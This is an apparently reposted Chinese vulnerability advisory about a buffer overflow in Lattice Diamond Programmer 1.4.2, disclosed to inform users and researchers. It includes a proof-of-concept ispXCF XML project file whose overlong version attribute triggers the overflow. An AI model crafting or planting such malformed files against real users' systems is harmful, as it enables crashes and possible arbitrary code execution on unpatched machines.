发布日期:2012-06-21
更新日期:2012-08-23受影响系统:
Lattice Semiconductor Diamond Programmer
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54149Lattice Diamond是一款FPGA设计软件工具套件。Diamond Programmer 1.4.2及其他版本在实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞执行任意代码。<*来源:Daniel Kazimirow
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Daniel Kazimirow ()提供了如下测试方法:/-----
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE ispXCF SYSTEM "IspXCF.dtd" >
<ispXCF
version="8.9.09.09999999999AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
<Comment></Comment>
<Chain>
<Comm>JTAG</Comm>
<Device>
<Pos>1</Pos>
<Vendor>Lattice</Vendor>
<Family>ispLSI 5000VE</Family>
<Name>5256VE</Name>
<IDCode>0x00368043</IDCode>
<Package>128-pin TQFP</Package>
<PON>ispLSI5256VE-XXLT128</PON>
<Bypass>
<InstrLen>5</InstrLen>
<InstrVal>11111</InstrVal>
<BScanLen>1</BScanLen>
<BScanVal>0</BScanVal>
</Bypass>
<File>C:ispTOOLSispvmsystemTutorialU6vea.jed</File>
<FileTime>05/17/02 18:15:33</FileTime>
<JedecChecksum>0xF9BD</JedecChecksum>
<Operation>Erase,Program,Verify</Operation>
<Option>
<SVFVendor>JTAG STANDARD</SVFVendor>
<IOState>HighZ</IOState>
<IOVectorData>0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000</IOVectorData>
<Reinitialize value="TRUE"/>
<OverideUES value="TRUE"/>
<TCKFrequency>1.000000 MHz</TCKFrequency>
<SVFProcessor>ispVM</SVFProcessor>
<Usercode>0x0000F9BD</Usercode>
</Option>
</Device>
</Chain>
<ProjectOptions>
<Program>SEQUENTIAL</Program>
<Process>ENTIRED CHAIN</Process>
<OperationOverride>No Override</OperationOverride>
<StartTAP>TLR</StartTAP>
<EndTAP>TLR</EndTAP>
<DeGlitch value="TRUE"/>
<VerifyUsercode value="TRUE"/>
<PinSetting>
TMS LOW;
TCK LOW;
TDI LOW;
TDO LOW;
TRST ABSENT;
CableEN HIGH;
</PinSetting>
</ProjectOptions>
</ispXCF>
-----/建议:
--------------------------------------------------------------------------------
厂商补丁:Lattice Semiconductor
---------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.latticesemi.com/products/designsoftware/programmer/index.cfmHP SAN/iQ多个远程命令注入漏洞Alt-N MDaemon Body HTML代码注入漏洞相关资讯 缓冲区溢出漏洞
- Novell iPrint Client 缓冲区溢出 (05/04/2013 07:13:08)
- Siemens WinCC CCEServer缓冲区溢 (03/22/2013 19:25:09)
- EMC AlphaStor DCP缓冲区溢出漏洞 (02/05/2013 09:14:34)
| - Siemens WinCC RegReader ActiveX (03/24/2013 08:07:04)
- Novell Messenger / Groupwise (03/18/2013 20:58:20)
- GNU Coreutils ‘sort’Text (02/02/2013 07:27:30)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参
|
易网时代-编程资源站